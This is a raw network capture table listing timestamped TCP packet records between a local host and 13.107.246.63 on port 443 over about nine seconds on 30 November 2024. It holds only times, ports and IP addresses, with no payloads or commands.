Nov 30, 2024 12:48:54.057077885 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.057157993 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.057262897 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.057276011 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.412734032 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.413340092 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.413363934 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.413736105 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.413741112 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.667258978 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.667814016 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.667826891 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.668138981 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.668143034 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.780319929 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.780807018 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.780819893 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.781392097 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.781400919 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.840301037 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.840687037 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.841016054 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.841042042 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.841382980 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.841388941 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.841659069 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.841720104 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.842046022 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.842065096 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.847750902 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.847807884 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.847860098 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.847867012 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.847909927 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.848078966 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.848097086 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.848107100 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.848112106 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.850547075 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.850616932 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:55.850703001 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.850824118 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:55.850855112 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.101639032 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.107173920 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.107217073 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.107220888 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.107265949 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.107328892 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.107338905 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.107348919 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.107353926 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.110858917 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.110893965 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.110954046 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.111072063 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.111083984 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.234117985 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.237299919 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.237462044 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.237462044 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.237462044 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.240063906 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.240091085 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.240160942 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.240313053 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.240325928 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.284183025 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.284328938 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.287760973 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.287797928 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.287822962 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.287916899 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.287916899 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.287926912 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.287949085 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.287949085 CET	49881	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.287965059 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.287972927 CET	443	49881	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.287983894 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.287983894 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.288014889 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.288038969 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.290205002 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.290245056 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.290324926 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.290328026 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.290338993 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.290435076 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.290452957 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.290461063 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.290618896 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.290628910 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:56.546634912 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:56.546646118 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.630278111 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.630790949 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:57.630840063 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.631269932 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:57.631285906 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.823029995 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.823529959 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:57.823542118 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.823885918 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:57.823890924 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.826698065 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.827022076 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:57.827047110 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:57.827385902 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:57.827392101 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.071106911 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.071556091 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.071577072 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.071862936 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.071989059 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.072000980 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.072089911 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.072098017 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.072405100 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.072408915 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.074400902 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.077516079 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.077595949 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.077744007 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.077744007 CET	49882	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.077773094 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.077796936 CET	443	49882	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.080467939 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.080492973 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.080569029 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.080713034 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.080729961 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.266561985 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.267241955 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.270076036 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.270134926 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.270231962 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.270231962 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.270268917 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.270268917 CET	49883	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.270286083 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.270294905 CET	443	49883	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.270395041 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.270447016 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.271420002 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.271430969 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.271444082 CET	49884	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.271449089 CET	443	49884	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.274071932 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.274096012 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.274153948 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.274704933 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.274739981 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.274796963 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.274880886 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.274890900 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.274971962 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.274983883 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.516232014 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.517021894 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.517041922 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.517072916 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.517091036 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.517124891 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.517187119 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.517193079 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.517201900 CET	49886	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.517205954 CET	443	49886	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.519274950 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.519294024 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.519375086 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.519479036 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.519491911 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.519504070 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.519536972 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.519563913 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.519577026 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.519589901 CET	49885	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.519597054 CET	443	49885	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.521348000 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.521378040 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:58.521440029 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.521536112 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:58.521543026 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:59.933120966 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:59.933598042 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:59.933614016 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:59.934081078 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:59.934088945 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.062527895 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.062536001 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.062987089 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.063007116 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.063010931 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.063025951 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.063436031 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.063441992 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.063548088 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.063551903 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.298224926 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.299134970 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.299143076 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.299752951 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.299761057 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.372163057 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.372611046 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.372622967 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.373028994 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.373034000 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.386909962 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.390727997 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.390800953 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.390865088 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.390887976 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.390904903 CET	49887	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.390912056 CET	443	49887	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.393363953 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.393392086 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.393471956 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.393614054 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.393629074 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.506268024 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.507270098 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.509876013 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.509910107 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.509927988 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.509963989 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.510006905 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.510020018 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.510030031 CET	49888	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.510034084 CET	443	49888	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.510327101 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.510390043 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.510409117 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.510420084 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.510430098 CET	49889	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.510435104 CET	443	49889	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.512056112 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.512089968 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.512156010 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.512238026 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.512243032 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.512250900 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.512255907 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.512312889 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.512423992 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.512435913 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.742857933 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.746283054 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.746345043 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.746386051 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.746391058 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.746400118 CET	49890	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.746402979 CET	443	49890	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.748783112 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.748812914 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.748884916 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.749015093 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.749027967 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.826699018 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.826725006 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.826766014 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.826786041 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.826822042 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.826994896 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.827003956 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.827014923 CET	49891	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.827018976 CET	443	49891	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.829734087 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.829788923 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:00.829878092 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.829979897 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:00.830010891 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.233923912 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.234581947 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.234602928 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.235058069 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.235063076 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.238868952 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.239135981 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.239150047 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.239466906 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.239471912 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.292501926 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.293112993 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.293138027 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.293586969 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.293591976 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.594424963 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.603648901 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.603677988 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.604145050 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.604151011 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.669203043 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.672570944 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.672656059 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.676779985 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.691479921 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.695321083 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.696096897 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.718388081 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.722652912 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.722667933 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.722676992 CET	49894	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.722681999 CET	443	49894	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.738264084 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.741585970 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.741652012 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.972121000 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.972153902 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.972831964 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.972845078 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.973980904 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.973989964 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:02.974001884 CET	49892	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:02.974009991 CET	443	49892	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.010323048 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.010354042 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.010369062 CET	49893	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.010376930 CET	443	49893	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.019155979 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.019213915 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.019269943 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.022146940 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.022190094 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.022257090 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.050214052 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.053760052 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.053793907 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.053809881 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.053848982 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.065898895 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.065912962 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.065932035 CET	49895	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.065942049 CET	443	49895	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.070655107 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.070676088 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.071031094 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.071069002 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.078547955 CET	49899	443	192.168.2.4	13.107.246.63
